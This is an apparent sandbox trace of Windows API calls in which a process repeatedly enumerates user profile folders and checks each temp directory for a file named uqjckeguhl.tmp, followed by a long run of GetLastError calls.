	[0108.675] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0108.675] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.676] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0108.676] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.677] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.677] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.677] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0108.677] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.678] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0108.695] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.696] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.698] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0108.698] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.698] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0108.698] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.698] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0108.698] FindClose (in: hFindFile=0x3959698 | out: hFindFile=0x3959698) returned 1
	[0113.720] GetProfilesDirectoryW () returned 0x0
	[0113.721] GetProfilesDirectoryW () returned 0x1
	[0113.721] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x664b38
	[0113.721] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.721] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.721] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0113.721] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.722] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0113.722] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.722] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.722] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0113.722] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.723] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0113.723] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.725] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.725] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0113.725] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.726] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0113.726] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.727] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.727] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.728] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0113.728] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.728] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0113.728] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.728] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0113.728] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0113.728] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.729] wsprintfW (in: param_1=0x68c300, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0113.729] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0113.729] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0113.729] FindClose (in: hFindFile=0x664b38 | out: hFindFile=0x664b38) returned 1
	[0118.737] GetProfilesDirectoryW () returned 0x0
	[0118.737] GetProfilesDirectoryW () returned 0x1
	[0118.738] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x664b38
	[0118.738] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.738] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.739] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0118.739] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.739] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0118.739] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.739] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.739] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0118.739] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.740] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0118.741] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.742] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.742] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0118.742] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.743] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0118.743] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.744] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.744] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.744] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0118.744] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.744] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0118.744] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.745] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0118.745] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0118.745] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.745] wsprintfW (in: param_1=0x68a080, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0118.745] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0118.745] FindNextFileW (in: hFindFile=0x664b38, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0118.745] FindClose (in: hFindFile=0x664b38 | out: hFindFile=0x664b38) returned 1
	[0123.753] GetProfilesDirectoryW () returned 0x0
	[0123.754] GetProfilesDirectoryW () returned 0x1
	[0123.754] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x396d098
	[0123.759] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.760] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.760] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0123.760] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.760] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0123.760] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.761] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.761] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0123.761] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.763] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0123.763] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.764] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.764] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0123.764] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.765] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0123.765] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.767] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.767] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.767] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0123.767] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.767] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0123.767] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.768] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0123.768] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0123.768] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.768] wsprintfW (in: param_1=0x689390, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0123.768] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0123.768] FindNextFileW (in: hFindFile=0x396d098, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0123.768] FindClose (in: hFindFile=0x396d098 | out: hFindFile=0x396d098) returned 1
	[0128.788] GetProfilesDirectoryW () returned 0x0
	[0128.789] GetProfilesDirectoryW () returned 0x1
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] GetLastError () returned 0x7a
	[0128.789] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x396c958
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.790] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0128.791] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.791] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0128.792] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0128.792] FindNextFileW (in: hFindFile=0x396c958, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.792] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0128.793] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.793] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.794] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
	[0128.795] GetLastError () returned 0x7a
